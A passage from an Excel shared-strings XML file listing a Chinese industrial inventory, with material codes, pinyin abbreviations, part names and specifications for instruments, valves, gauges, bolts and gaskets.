  </si>
  <si>
    <t>JD6-</t>
  </si>
  <si>
    <t>02010547</t>
  </si>
  <si>
    <t>TBZ</t>
  </si>
  <si>
    <t>DT50</t>
  </si>
  <si>
    <t>02010551</t>
  </si>
  <si>
    <t>Y112M-4  4KWB5 猛牛</t>
  </si>
  <si>
    <t>02010555</t>
  </si>
  <si>
    <t>LGJT</t>
  </si>
  <si>
    <t>铝管接头</t>
  </si>
  <si>
    <t>95A</t>
  </si>
  <si>
    <t>02010561</t>
  </si>
  <si>
    <t>DJFY</t>
  </si>
  <si>
    <t>02010561-1</t>
  </si>
  <si>
    <t>风叶</t>
  </si>
  <si>
    <t>Y-180</t>
  </si>
  <si>
    <t>02010561-2</t>
  </si>
  <si>
    <t>Y-160</t>
  </si>
  <si>
    <t>02010561-3</t>
  </si>
  <si>
    <t>132-2</t>
  </si>
  <si>
    <t>02010562</t>
  </si>
  <si>
    <t>YJD</t>
  </si>
  <si>
    <t>应急灯</t>
  </si>
  <si>
    <t>02010590</t>
  </si>
  <si>
    <t>TSSJ</t>
  </si>
  <si>
    <t>铜伸缩节</t>
  </si>
  <si>
    <t>02010595-1</t>
  </si>
  <si>
    <t>烙铁芯</t>
  </si>
  <si>
    <t>100W</t>
  </si>
  <si>
    <t>02010596-1</t>
  </si>
  <si>
    <t>万能式断路器电机</t>
  </si>
  <si>
    <t>DW17-1600A</t>
  </si>
  <si>
    <t>02010602</t>
  </si>
  <si>
    <t>RT0-400A</t>
  </si>
  <si>
    <t>02010611</t>
  </si>
  <si>
    <t>25A</t>
  </si>
  <si>
    <t>02010613</t>
  </si>
  <si>
    <t>FY</t>
  </si>
  <si>
    <t>02010617</t>
  </si>
  <si>
    <t>bxgpdx</t>
  </si>
  <si>
    <t>不锈钢配电箱</t>
  </si>
  <si>
    <t>500*400*300</t>
  </si>
  <si>
    <t>02010619</t>
  </si>
  <si>
    <t>YMLBG</t>
  </si>
  <si>
    <t>云母喇叭管</t>
  </si>
  <si>
    <t>49*43*230</t>
  </si>
  <si>
    <t>02010620</t>
  </si>
  <si>
    <t>YMDP</t>
  </si>
  <si>
    <t>云母电片</t>
  </si>
  <si>
    <t>50*85</t>
  </si>
  <si>
    <t>02010626</t>
  </si>
  <si>
    <t>断火限位器</t>
  </si>
  <si>
    <t>LX44-40</t>
  </si>
  <si>
    <t>02010626-1</t>
  </si>
  <si>
    <t>重锤限位器</t>
  </si>
  <si>
    <t>32/10</t>
  </si>
  <si>
    <t>02010627</t>
  </si>
  <si>
    <t>集电器</t>
  </si>
  <si>
    <t>JD4-16/25</t>
  </si>
  <si>
    <t>02010634</t>
  </si>
  <si>
    <t>避雷器</t>
  </si>
  <si>
    <t>02010636</t>
  </si>
  <si>
    <t>倒顺开关</t>
  </si>
  <si>
    <t>02010637</t>
  </si>
  <si>
    <t>02011174</t>
  </si>
  <si>
    <t>保险丝</t>
  </si>
  <si>
    <t>02020101-1</t>
  </si>
  <si>
    <t>YLSWDKZQ</t>
  </si>
  <si>
    <t>压力式温度控制器</t>
  </si>
  <si>
    <t>350</t>
  </si>
  <si>
    <t>02020103</t>
  </si>
  <si>
    <t>ZXLJT</t>
  </si>
  <si>
    <t>直行连接头</t>
  </si>
  <si>
    <t>M27*2 H=120 a=40</t>
  </si>
  <si>
    <t>02020108</t>
  </si>
  <si>
    <t>ZNGZXSY0-1000</t>
  </si>
  <si>
    <t>智能光柱显示仪</t>
  </si>
  <si>
    <t>LDCH-3152/V  0-1000</t>
  </si>
  <si>
    <t>02020108-2</t>
  </si>
  <si>
    <t>ZNXSY</t>
  </si>
  <si>
    <t>智能显示仪</t>
  </si>
  <si>
    <t>02020111</t>
  </si>
  <si>
    <t>RDZ</t>
  </si>
  <si>
    <t>热电阻</t>
  </si>
  <si>
    <t>护套pt100  1=150mm</t>
  </si>
  <si>
    <t>02020112-1</t>
  </si>
  <si>
    <t>ZJJT</t>
  </si>
  <si>
    <t>中间接头</t>
  </si>
  <si>
    <t>02020124</t>
  </si>
  <si>
    <t>YLB</t>
  </si>
  <si>
    <t>不锈钢轴向带边压力表</t>
  </si>
  <si>
    <t>Y-103</t>
  </si>
  <si>
    <t>02020127</t>
  </si>
  <si>
    <t>FBRDZ</t>
  </si>
  <si>
    <t>防爆热电阻</t>
  </si>
  <si>
    <t>pt100 M27*2  300/150</t>
  </si>
  <si>
    <t>02020127-1</t>
  </si>
  <si>
    <t>PT100 316L L=300/150MM</t>
  </si>
  <si>
    <t>02020131-1</t>
  </si>
  <si>
    <t>电缆牌</t>
  </si>
  <si>
    <t>02020131-4</t>
  </si>
  <si>
    <t>电磁阀底座垫</t>
  </si>
  <si>
    <t>02020149-3</t>
  </si>
  <si>
    <t>焊接弯头</t>
  </si>
  <si>
    <t>02020153</t>
  </si>
  <si>
    <t>AQS</t>
  </si>
  <si>
    <t>EKZ9771A</t>
  </si>
  <si>
    <t>02020153-1</t>
  </si>
  <si>
    <t>防爆安全栅</t>
  </si>
  <si>
    <t>一进一出</t>
  </si>
  <si>
    <t>02020154-1</t>
  </si>
  <si>
    <t>不锈钢防震压力表</t>
  </si>
  <si>
    <t>0-2.5</t>
  </si>
  <si>
    <t>02020158</t>
  </si>
  <si>
    <t>JLYPJ</t>
  </si>
  <si>
    <t>记录仪配件</t>
  </si>
  <si>
    <t>翻板 xwc-3000</t>
  </si>
  <si>
    <t>02020162</t>
  </si>
  <si>
    <t>磁励装置控制器</t>
  </si>
  <si>
    <t>02020162-1</t>
  </si>
  <si>
    <t>浮子流量计</t>
  </si>
  <si>
    <t>0.1-1  l/n</t>
  </si>
  <si>
    <t>02020169-1</t>
  </si>
  <si>
    <t>转速传感器</t>
  </si>
  <si>
    <t>M16*1.5  L=100mm</t>
  </si>
  <si>
    <t>02020502</t>
  </si>
  <si>
    <t>ZXJG</t>
  </si>
  <si>
    <t>执行机构</t>
  </si>
  <si>
    <t>02020507</t>
  </si>
  <si>
    <t>TLJ</t>
  </si>
  <si>
    <t>脱硫剂</t>
  </si>
  <si>
    <t>控氧仪用  500g</t>
  </si>
  <si>
    <t>袋</t>
  </si>
  <si>
    <t>02020509</t>
  </si>
  <si>
    <t>JYQ</t>
  </si>
  <si>
    <t>空气过滤减压器</t>
  </si>
  <si>
    <t>QFH-111</t>
  </si>
  <si>
    <t>02020512</t>
  </si>
  <si>
    <t>FB</t>
  </si>
  <si>
    <t>翻板</t>
  </si>
  <si>
    <t>02020513</t>
  </si>
  <si>
    <t>CPU机芯</t>
  </si>
  <si>
    <t>02020514</t>
  </si>
  <si>
    <t>HG</t>
  </si>
  <si>
    <t>划杆</t>
  </si>
  <si>
    <t>02020516</t>
  </si>
  <si>
    <t>ZHKGXWC-300</t>
  </si>
  <si>
    <t>转换开关</t>
  </si>
  <si>
    <t>XWC-300 6点</t>
  </si>
  <si>
    <t>02020516-2</t>
  </si>
  <si>
    <t>手轮</t>
  </si>
  <si>
    <t>02020517</t>
  </si>
  <si>
    <t>DZT</t>
  </si>
  <si>
    <t>打字头</t>
  </si>
  <si>
    <t>XWC-300  6点</t>
  </si>
  <si>
    <t>02020518</t>
  </si>
  <si>
    <t>QLB</t>
  </si>
  <si>
    <t>桥路板</t>
  </si>
  <si>
    <t>XWC-300型 K 0-600℃</t>
  </si>
  <si>
    <t>02020522</t>
  </si>
  <si>
    <t>ZZJG</t>
  </si>
  <si>
    <t>走字机构</t>
  </si>
  <si>
    <t>02020523</t>
  </si>
  <si>
    <t>JXJG</t>
  </si>
  <si>
    <t>间歇机构</t>
  </si>
  <si>
    <t>02020524-1</t>
  </si>
  <si>
    <t>电位器</t>
  </si>
  <si>
    <t>3K</t>
  </si>
  <si>
    <t>02020528-3</t>
  </si>
  <si>
    <t>模块</t>
  </si>
  <si>
    <t>224</t>
  </si>
  <si>
    <t>02020535</t>
  </si>
  <si>
    <t>JDQB</t>
  </si>
  <si>
    <t>继电器板</t>
  </si>
  <si>
    <t>02020536</t>
  </si>
  <si>
    <t>MKXP313-314</t>
  </si>
  <si>
    <t>XP313-314</t>
  </si>
  <si>
    <t>02020539-2</t>
  </si>
  <si>
    <t>和利时模块</t>
  </si>
  <si>
    <t>02020540-1</t>
  </si>
  <si>
    <t>JT</t>
  </si>
  <si>
    <t>接头</t>
  </si>
  <si>
    <t>02020541-4</t>
  </si>
  <si>
    <t>断路器</t>
  </si>
  <si>
    <t>250</t>
  </si>
  <si>
    <t>02020545-1</t>
  </si>
  <si>
    <t>02020547</t>
  </si>
  <si>
    <t>JJKG</t>
  </si>
  <si>
    <t>接近开关（阀位传感器）</t>
  </si>
  <si>
    <t>HY-3020AL</t>
  </si>
  <si>
    <t>02020548</t>
  </si>
  <si>
    <t>100</t>
  </si>
  <si>
    <t>02020550</t>
  </si>
  <si>
    <t>FDQ</t>
  </si>
  <si>
    <t>放大器</t>
  </si>
  <si>
    <t>02020554</t>
  </si>
  <si>
    <t>ZHK</t>
  </si>
  <si>
    <t>转换卡</t>
  </si>
  <si>
    <t>02020556</t>
  </si>
  <si>
    <t>YDJ</t>
  </si>
  <si>
    <t>氧电极</t>
  </si>
  <si>
    <t>KY-2B</t>
  </si>
  <si>
    <t>02020557</t>
  </si>
  <si>
    <t>调理模块</t>
  </si>
  <si>
    <t>02020558-3</t>
  </si>
  <si>
    <t>热电偶</t>
  </si>
  <si>
    <t>02020561</t>
  </si>
  <si>
    <t>JLB</t>
  </si>
  <si>
    <t>记录笔</t>
  </si>
  <si>
    <t>02020566</t>
  </si>
  <si>
    <t>压力控制器</t>
  </si>
  <si>
    <t>02020572-1</t>
  </si>
  <si>
    <t>双法兰液位计</t>
  </si>
  <si>
    <t>02020577</t>
  </si>
  <si>
    <t>jxh</t>
  </si>
  <si>
    <t>接线盒</t>
  </si>
  <si>
    <t>30对</t>
  </si>
  <si>
    <t>02020580</t>
  </si>
  <si>
    <t>JLYGT</t>
  </si>
  <si>
    <t>记录仪滚筒</t>
  </si>
  <si>
    <t>02020582-1</t>
  </si>
  <si>
    <t>电源板</t>
  </si>
  <si>
    <t>24 vdc</t>
  </si>
  <si>
    <t>02020582-2</t>
  </si>
  <si>
    <t>滤过板</t>
  </si>
  <si>
    <t>0-600</t>
  </si>
  <si>
    <t>02020582-3</t>
  </si>
  <si>
    <t>放大板</t>
  </si>
  <si>
    <t>2420</t>
  </si>
  <si>
    <t>02020582-4</t>
  </si>
  <si>
    <t>继电器输出板</t>
  </si>
  <si>
    <t>HBY-IVJ</t>
  </si>
  <si>
    <t>02020582-5</t>
  </si>
  <si>
    <t>信号调理板</t>
  </si>
  <si>
    <t>02020584</t>
  </si>
  <si>
    <t>MK</t>
  </si>
  <si>
    <t>FM147A</t>
  </si>
  <si>
    <t>02020585</t>
  </si>
  <si>
    <t>FM148</t>
  </si>
  <si>
    <t>02020586</t>
  </si>
  <si>
    <t>FM151A</t>
  </si>
  <si>
    <t>02020587</t>
  </si>
  <si>
    <t>wjkg</t>
  </si>
  <si>
    <t>微机开关</t>
  </si>
  <si>
    <t>2*2</t>
  </si>
  <si>
    <t>02020598</t>
  </si>
  <si>
    <t>阀检</t>
  </si>
  <si>
    <t>阀检传感器</t>
  </si>
  <si>
    <t>02020601</t>
  </si>
  <si>
    <t>ylbljt</t>
  </si>
  <si>
    <t>压力表接头</t>
  </si>
  <si>
    <t>M20X 1.5</t>
  </si>
  <si>
    <t>02020605</t>
  </si>
  <si>
    <t>szxjy</t>
  </si>
  <si>
    <t>LDDB 311/12  0-600℃</t>
  </si>
  <si>
    <t>02020606</t>
  </si>
  <si>
    <t>SD</t>
  </si>
  <si>
    <t>色带</t>
  </si>
  <si>
    <t>02020607</t>
  </si>
  <si>
    <t>MS</t>
  </si>
  <si>
    <t>记录墨水</t>
  </si>
  <si>
    <t>红  蓝</t>
  </si>
  <si>
    <t>02020608</t>
  </si>
  <si>
    <t>znxjy</t>
  </si>
  <si>
    <t>智能巡检仪</t>
  </si>
  <si>
    <t>LDDB-312/08  pt100</t>
  </si>
  <si>
    <t>02020615</t>
  </si>
  <si>
    <t>记录纸</t>
  </si>
  <si>
    <t>02020617</t>
  </si>
  <si>
    <t>JLZ180-200E-8-3</t>
  </si>
  <si>
    <t>180-200E-8-3   0-300</t>
  </si>
  <si>
    <t>02020618</t>
  </si>
  <si>
    <t>JLZ114-14</t>
  </si>
  <si>
    <t>114-14   0-100</t>
  </si>
  <si>
    <t>02020622</t>
  </si>
  <si>
    <t>NZKG</t>
  </si>
  <si>
    <t>钮子开关</t>
  </si>
  <si>
    <t>02020624</t>
  </si>
  <si>
    <t>JTKG</t>
  </si>
  <si>
    <t>脚踏开关</t>
  </si>
  <si>
    <t>EKW  5A</t>
  </si>
  <si>
    <t>02020628</t>
  </si>
  <si>
    <t>隔离安全删</t>
  </si>
  <si>
    <t>智能型模拟量输入</t>
  </si>
  <si>
    <t>02020631</t>
  </si>
  <si>
    <t>DCF</t>
  </si>
  <si>
    <t>电磁阀</t>
  </si>
  <si>
    <t>4V 210-8 DC24V 3W</t>
  </si>
  <si>
    <t>02020632-1</t>
  </si>
  <si>
    <t>智能调节仪</t>
  </si>
  <si>
    <t>3952/v  0-100℃</t>
  </si>
  <si>
    <t>02020637-3</t>
  </si>
  <si>
    <t>WLLLCGQ</t>
  </si>
  <si>
    <t>涡轮流量传感器</t>
  </si>
  <si>
    <t>0-70M3/H   DN65</t>
  </si>
  <si>
    <t>02020637-5</t>
  </si>
  <si>
    <t>探头</t>
  </si>
  <si>
    <t>02020639</t>
  </si>
  <si>
    <t>bdz</t>
  </si>
  <si>
    <t>铂电阻</t>
  </si>
  <si>
    <t>WZPK-345  pt100 L=300</t>
  </si>
  <si>
    <t>02020642</t>
  </si>
  <si>
    <t>DWQ</t>
  </si>
  <si>
    <t>4.7k</t>
  </si>
  <si>
    <t>02020654</t>
  </si>
  <si>
    <t>温度计</t>
  </si>
  <si>
    <t>0-300</t>
  </si>
  <si>
    <t>02020654-3</t>
  </si>
  <si>
    <t>温度表</t>
  </si>
  <si>
    <t>02020658</t>
  </si>
  <si>
    <t>HKCTCZ</t>
  </si>
  <si>
    <t>航空插头插座</t>
  </si>
  <si>
    <t>CA20KZ  20芯</t>
  </si>
  <si>
    <t>02020659</t>
  </si>
  <si>
    <t>BLBYWJ</t>
  </si>
  <si>
    <t>玻璃板液位计</t>
  </si>
  <si>
    <t>0-200℃</t>
  </si>
  <si>
    <t>02020661</t>
  </si>
  <si>
    <t>KZRDZ</t>
  </si>
  <si>
    <t>铠装铂电阻</t>
  </si>
  <si>
    <t>pt100G1/2  L=200mm</t>
  </si>
  <si>
    <t>02020664</t>
  </si>
  <si>
    <t>KKG</t>
  </si>
  <si>
    <t>可控硅</t>
  </si>
  <si>
    <t>1600A</t>
  </si>
  <si>
    <t>02020665</t>
  </si>
  <si>
    <t>02020666</t>
  </si>
  <si>
    <t>电阻</t>
  </si>
  <si>
    <t>02020669</t>
  </si>
  <si>
    <t>JDQ</t>
  </si>
  <si>
    <t>12V</t>
  </si>
  <si>
    <t>02020671</t>
  </si>
  <si>
    <t>02020672</t>
  </si>
  <si>
    <t>CGQ</t>
  </si>
  <si>
    <t>传感器</t>
  </si>
  <si>
    <t>02020674</t>
  </si>
  <si>
    <t>DQFMDWQ</t>
  </si>
  <si>
    <t>电气阀门定位器</t>
  </si>
  <si>
    <t>EDP-01 4-20mADC</t>
  </si>
  <si>
    <t>02020674-1</t>
  </si>
  <si>
    <t>反作用  0-100mm</t>
  </si>
  <si>
    <t>02020676</t>
  </si>
  <si>
    <t>KZQ</t>
  </si>
  <si>
    <t>YWK-50  0-1Mpa</t>
  </si>
  <si>
    <t>02020678</t>
  </si>
  <si>
    <t>fz</t>
  </si>
  <si>
    <t>浮子</t>
  </si>
  <si>
    <t>02020696</t>
  </si>
  <si>
    <t>KG</t>
  </si>
  <si>
    <t>卡轨</t>
  </si>
  <si>
    <t>02020697</t>
  </si>
  <si>
    <t>DRSYWJ</t>
  </si>
  <si>
    <t>电容式液位计</t>
  </si>
  <si>
    <t>0-2000mm</t>
  </si>
  <si>
    <t>02020697-6</t>
  </si>
  <si>
    <t>插入式电容液位计</t>
  </si>
  <si>
    <t>2500mm32mpadn25</t>
  </si>
  <si>
    <t>02020730</t>
  </si>
  <si>
    <t>RZZ</t>
  </si>
  <si>
    <t>L/L=350/200</t>
  </si>
  <si>
    <t>02020731</t>
  </si>
  <si>
    <t>LDDB-122/08pt100  0-200℃</t>
  </si>
  <si>
    <t>02020732</t>
  </si>
  <si>
    <t>02020739</t>
  </si>
  <si>
    <t>AYYLB</t>
  </si>
  <si>
    <t>氨用压力表</t>
  </si>
  <si>
    <t>02020739-1</t>
  </si>
  <si>
    <t>YA-250</t>
  </si>
  <si>
    <t>02020750</t>
  </si>
  <si>
    <t>ZXDBYLBY100   0-6</t>
  </si>
  <si>
    <t>轴向带边压力表</t>
  </si>
  <si>
    <t>Y100   0-6</t>
  </si>
  <si>
    <t>02020758</t>
  </si>
  <si>
    <t>NZBXGYLB</t>
  </si>
  <si>
    <t>耐震不锈钢压力表</t>
  </si>
  <si>
    <t>Y-150BF 0-4  0-60 316L</t>
  </si>
  <si>
    <t>02020768-1</t>
  </si>
  <si>
    <t>NMRDO</t>
  </si>
  <si>
    <t>耐磨热电偶</t>
  </si>
  <si>
    <t>WRNCD-131   L-1000mm</t>
  </si>
  <si>
    <t>02020775</t>
  </si>
  <si>
    <t>ZNTJQ</t>
  </si>
  <si>
    <t>智能调节器</t>
  </si>
  <si>
    <t>LDCH--3922</t>
  </si>
  <si>
    <t>02020780</t>
  </si>
  <si>
    <t>FBRDO</t>
  </si>
  <si>
    <t>防爆热电偶</t>
  </si>
  <si>
    <t>02020784</t>
  </si>
  <si>
    <t>TDZYJ</t>
  </si>
  <si>
    <t>铜电阻元件</t>
  </si>
  <si>
    <t>02020785</t>
  </si>
  <si>
    <t>BDZYJ</t>
  </si>
  <si>
    <t>铂电阻元件</t>
  </si>
  <si>
    <t>02020785-2</t>
  </si>
  <si>
    <t>BDZYJSZ</t>
  </si>
  <si>
    <t>铂电阻元件双支</t>
  </si>
  <si>
    <t>1000MM</t>
  </si>
  <si>
    <t>02020795</t>
  </si>
  <si>
    <t>02020795-1</t>
  </si>
  <si>
    <t>SM322</t>
  </si>
  <si>
    <t>02020795-13</t>
  </si>
  <si>
    <t>EM120</t>
  </si>
  <si>
    <t>02020795-14</t>
  </si>
  <si>
    <t>EM116</t>
  </si>
  <si>
    <t>02020795-3</t>
  </si>
  <si>
    <t>OMRON</t>
  </si>
  <si>
    <t>02020795-4</t>
  </si>
  <si>
    <t>FM152</t>
  </si>
  <si>
    <t>02020795-7</t>
  </si>
  <si>
    <t>MKEM235</t>
  </si>
  <si>
    <t>EM235</t>
  </si>
  <si>
    <t>02020804</t>
  </si>
  <si>
    <t>KKGEJG</t>
  </si>
  <si>
    <t>可控硅二极管</t>
  </si>
  <si>
    <t>02020807</t>
  </si>
  <si>
    <t>EJG</t>
  </si>
  <si>
    <t>二极管</t>
  </si>
  <si>
    <t>02020809</t>
  </si>
  <si>
    <t>SRP</t>
  </si>
  <si>
    <t>水冷散热片</t>
  </si>
  <si>
    <t>SS13型</t>
  </si>
  <si>
    <t>02020812</t>
  </si>
  <si>
    <t>FMQ</t>
  </si>
  <si>
    <t>蜂鸣器</t>
  </si>
  <si>
    <t>HRB-P-80</t>
  </si>
  <si>
    <t>02020814</t>
  </si>
  <si>
    <t>YLBSQ</t>
  </si>
  <si>
    <t>AO-901  0-0.6Mpa</t>
  </si>
  <si>
    <t>02020833-1</t>
  </si>
  <si>
    <t>调速电机控制器</t>
  </si>
  <si>
    <t>02020834</t>
  </si>
  <si>
    <t>YCKZQ</t>
  </si>
  <si>
    <t>压差控制器</t>
  </si>
  <si>
    <t>02020842</t>
  </si>
  <si>
    <t>ZKMHZ</t>
  </si>
  <si>
    <t>真空灭弧罩</t>
  </si>
  <si>
    <t>02020868-2</t>
  </si>
  <si>
    <t>电动葫芦控制箱</t>
  </si>
  <si>
    <t>380V</t>
  </si>
  <si>
    <t>02020883</t>
  </si>
  <si>
    <t>LLCGQ</t>
  </si>
  <si>
    <t>流量传感器</t>
  </si>
  <si>
    <t>02020893-1</t>
  </si>
  <si>
    <t>3L=5000mm</t>
  </si>
  <si>
    <t>02020973</t>
  </si>
  <si>
    <t>安全删</t>
  </si>
  <si>
    <t>NPEXA-P</t>
  </si>
  <si>
    <t>02020974-3</t>
  </si>
  <si>
    <t>02020979</t>
  </si>
  <si>
    <t>GLSAQS</t>
  </si>
  <si>
    <t>隔离式安全栅</t>
  </si>
  <si>
    <t>EKZ-9745</t>
  </si>
  <si>
    <t>02020982</t>
  </si>
  <si>
    <t>电缆</t>
  </si>
  <si>
    <t>YJV2*2.5</t>
  </si>
  <si>
    <t>02021013-6</t>
  </si>
  <si>
    <t>潜水线</t>
  </si>
  <si>
    <t>02021093</t>
  </si>
  <si>
    <t>BSQ</t>
  </si>
  <si>
    <t>02021135</t>
  </si>
  <si>
    <t>WT-2000-110A</t>
  </si>
  <si>
    <t>02021167-1</t>
  </si>
  <si>
    <t>DCHXF</t>
  </si>
  <si>
    <t>电磁换向阀</t>
  </si>
  <si>
    <t>282-D24-N1-50</t>
  </si>
  <si>
    <t>02021167-2</t>
  </si>
  <si>
    <t>cg24n9z5l</t>
  </si>
  <si>
    <t>02021171-2</t>
  </si>
  <si>
    <t>主芯片</t>
  </si>
  <si>
    <t>02021173-1</t>
  </si>
  <si>
    <t>02021177</t>
  </si>
  <si>
    <t>mp</t>
  </si>
  <si>
    <t>膜片</t>
  </si>
  <si>
    <t>02021177-1</t>
  </si>
  <si>
    <t>MPDN80</t>
  </si>
  <si>
    <t>DN  80</t>
  </si>
  <si>
    <t>02021184</t>
  </si>
  <si>
    <t>QYQF</t>
  </si>
  <si>
    <t>气源球阀</t>
  </si>
  <si>
    <t>∮8</t>
  </si>
  <si>
    <t>02021184-1</t>
  </si>
  <si>
    <t>锥型阀</t>
  </si>
  <si>
    <t>02021184-2</t>
  </si>
  <si>
    <t>ZXF</t>
  </si>
  <si>
    <t>针型阀</t>
  </si>
  <si>
    <t>10*1</t>
  </si>
  <si>
    <t>02021185-1</t>
  </si>
  <si>
    <t>晶闸管整流器</t>
  </si>
  <si>
    <t>1200V  平面凹形</t>
  </si>
  <si>
    <t>02021185-3</t>
  </si>
  <si>
    <t>JZG KP-200A</t>
  </si>
  <si>
    <t>晶闸管</t>
  </si>
  <si>
    <t>KP-200A平面凹型1600V</t>
  </si>
  <si>
    <t>02021185-5</t>
  </si>
  <si>
    <t>2500A</t>
  </si>
  <si>
    <t>02021186</t>
  </si>
  <si>
    <t>调压油水过滤器</t>
  </si>
  <si>
    <t>BL  3000</t>
  </si>
  <si>
    <t>02021186-1</t>
  </si>
  <si>
    <t>过滤器芯</t>
  </si>
  <si>
    <t>02021189</t>
  </si>
  <si>
    <t>压力表弯通</t>
  </si>
  <si>
    <t>02021189-3</t>
  </si>
  <si>
    <t>DXT</t>
  </si>
  <si>
    <t>导向套</t>
  </si>
  <si>
    <t>6.4MPA</t>
  </si>
  <si>
    <t>02021189-4</t>
  </si>
  <si>
    <t>导向套用密封件</t>
  </si>
  <si>
    <t>DN80 PN6.4MPA</t>
  </si>
  <si>
    <t>02021189-5</t>
  </si>
  <si>
    <t>轴密封衬套</t>
  </si>
  <si>
    <t>02021194</t>
  </si>
  <si>
    <t>YA150  0-0.6Mpa</t>
  </si>
  <si>
    <t>02021195</t>
  </si>
  <si>
    <t>压力表</t>
  </si>
  <si>
    <t>Y-100  0-4Mpa</t>
  </si>
  <si>
    <t>02021197</t>
  </si>
  <si>
    <t>Y-100  0-1Mpa</t>
  </si>
  <si>
    <t>02021200</t>
  </si>
  <si>
    <t>PDQ6512B</t>
  </si>
  <si>
    <t>配电器</t>
  </si>
  <si>
    <t>6512B</t>
  </si>
  <si>
    <t>02030503</t>
  </si>
  <si>
    <t>QQ</t>
  </si>
  <si>
    <t>氢气</t>
  </si>
  <si>
    <t>02030542</t>
  </si>
  <si>
    <t>hhq</t>
  </si>
  <si>
    <t>混合气</t>
  </si>
  <si>
    <t>瓶</t>
  </si>
  <si>
    <t>02030543</t>
  </si>
  <si>
    <t>lp</t>
  </si>
  <si>
    <t>铝瓶</t>
  </si>
  <si>
    <t>40L</t>
  </si>
  <si>
    <t>03010103</t>
  </si>
  <si>
    <t>GYLSM20</t>
  </si>
  <si>
    <t>高压螺栓</t>
  </si>
  <si>
    <t>M20</t>
  </si>
  <si>
    <t>03010105</t>
  </si>
  <si>
    <t>GYLSM27</t>
  </si>
  <si>
    <t>M27</t>
  </si>
  <si>
    <t>03010106</t>
  </si>
  <si>
    <t>GYLSM30</t>
  </si>
  <si>
    <t>M30</t>
  </si>
  <si>
    <t>03010108</t>
  </si>
  <si>
    <t>GYLSM36</t>
  </si>
  <si>
    <t>M36</t>
  </si>
  <si>
    <t>03010109</t>
  </si>
  <si>
    <t>GYLSM39</t>
  </si>
  <si>
    <t>M48</t>
  </si>
  <si>
    <t>03010129</t>
  </si>
  <si>
    <t>高压螺丝</t>
  </si>
  <si>
    <t>03010129-1</t>
  </si>
  <si>
    <t>GYLS</t>
  </si>
  <si>
    <t>M22</t>
  </si>
  <si>
    <t>03010130</t>
  </si>
  <si>
    <t>GYLSM24</t>
  </si>
  <si>
    <t>M24</t>
  </si>
  <si>
    <t>03010131</t>
  </si>
  <si>
    <t>03010134-1</t>
  </si>
  <si>
    <t>M45</t>
  </si>
  <si>
    <t>03010144</t>
  </si>
  <si>
    <t>GYLMM16</t>
  </si>
  <si>
    <t>高压螺母</t>
  </si>
  <si>
    <t>03010146</t>
  </si>
  <si>
    <t>GYLMM20</t>
  </si>
  <si>
    <t>03010150-1</t>
  </si>
  <si>
    <t>GYLM</t>
  </si>
  <si>
    <t>03010151</t>
  </si>
  <si>
    <t>GYLMM45</t>
  </si>
  <si>
    <t>03010152-1</t>
  </si>
  <si>
    <t>03010154</t>
  </si>
  <si>
    <t>304LS</t>
  </si>
  <si>
    <t>304螺丝</t>
  </si>
  <si>
    <t>16</t>
  </si>
  <si>
    <t>03010156</t>
  </si>
  <si>
    <t>BXGLS</t>
  </si>
  <si>
    <t>不锈钢螺栓</t>
  </si>
  <si>
    <t>M12</t>
  </si>
  <si>
    <t>03010156-1</t>
  </si>
  <si>
    <t>M10</t>
  </si>
  <si>
    <t>03010158</t>
  </si>
  <si>
    <t>316LLSM6</t>
  </si>
  <si>
    <t>316L螺栓</t>
  </si>
  <si>
    <t>M6</t>
  </si>
  <si>
    <t>03010159</t>
  </si>
  <si>
    <t>20</t>
  </si>
  <si>
    <t>03010163</t>
  </si>
  <si>
    <t>LLSM10</t>
  </si>
  <si>
    <t>不锈钢螺丝</t>
  </si>
  <si>
    <t>03010164-1</t>
  </si>
  <si>
    <t>BXGLM</t>
  </si>
  <si>
    <t>不锈钢螺母</t>
  </si>
  <si>
    <t>6-10</t>
  </si>
  <si>
    <t>03010167</t>
  </si>
  <si>
    <t>BXGSGM12</t>
  </si>
  <si>
    <t>不锈钢丝杆</t>
  </si>
  <si>
    <t>M12-14</t>
  </si>
  <si>
    <t>03020202</t>
  </si>
  <si>
    <t>TJDPN</t>
  </si>
  <si>
    <t>透镜垫</t>
  </si>
  <si>
    <t>DN15</t>
  </si>
  <si>
    <t>03020207</t>
  </si>
  <si>
    <t>TJDPN320DN10</t>
  </si>
  <si>
    <t>PN320DN10</t>
  </si>
  <si>
    <t>03020208</t>
  </si>
  <si>
    <t>TJDPN320DN15</t>
  </si>
  <si>
    <t>不锈钢透镜垫</t>
  </si>
  <si>
    <t>PN320DN15</t>
  </si>
  <si>
    <t>03020211</t>
  </si>
  <si>
    <t>TJDPN320DN40</t>
  </si>
  <si>
    <t>PN320DN40</t>
  </si>
  <si>
    <t>03020214-1</t>
  </si>
  <si>
    <t>TJD</t>
  </si>
  <si>
    <t>320DN200</t>
  </si>
  <si>
    <t>03020215</t>
  </si>
  <si>
    <t>TJDPN220DN100</t>
  </si>
  <si>
    <t>PN220DN100</t>
  </si>
  <si>
    <t>03020215-1</t>
  </si>
  <si>
    <t>03020216</t>
  </si>
  <si>
    <t>TJDPN220DN80</t>
  </si>
  <si>
    <t>PN220DN80</t>
  </si>
  <si>
    <t>03020218</t>
  </si>
  <si>
    <t>TJDPN220DN150</t>
  </si>
  <si>
    <t>PN220DN150</t>
  </si>
  <si>
    <t>03020221</t>
  </si>
  <si>
    <t>TJDPN320DN150</t>
  </si>
  <si>
    <t>PN320DN150</t>
  </si>
  <si>
    <t>03020228-1</t>
  </si>
  <si>
    <t>BXGTJD</t>
  </si>
  <si>
    <t>DN65</t>
  </si>
  <si>
    <t>03020230-1</t>
  </si>
  <si>
    <t>WKTJD</t>
  </si>
  <si>
    <t>无孔透镜垫</t>
  </si>
  <si>
    <t>03020230-2</t>
  </si>
  <si>
    <t>03020231</t>
  </si>
  <si>
    <t>DN40</t>
  </si>
  <si>
    <t>316L透镜垫</t>
  </si>
  <si>
    <t>03020231-1</t>
  </si>
  <si>
    <t>PN220-DN150</t>
  </si>
  <si>
    <t>03020232-1</t>
  </si>
  <si>
    <t>MB</t>
  </si>
  <si>
    <t>无孔垫</t>
  </si>
  <si>
    <t>03020237</t>
  </si>
  <si>
    <t>DYTJD</t>
  </si>
  <si>
    <t>单引透镜垫</t>
  </si>
  <si>
    <t>03030307</t>
  </si>
  <si>
    <t>WTΦ57</t>
  </si>
  <si>
    <t>Φ57</t>
  </si>
  <si>
    <t>03030309-1</t>
  </si>
  <si>
    <t>UXW</t>
  </si>
  <si>
    <t>u型弯</t>
  </si>
  <si>
    <t>68*10</t>
  </si>
  <si>
    <t>03030323</t>
  </si>
  <si>
    <t>304LWTΦ159</t>
  </si>
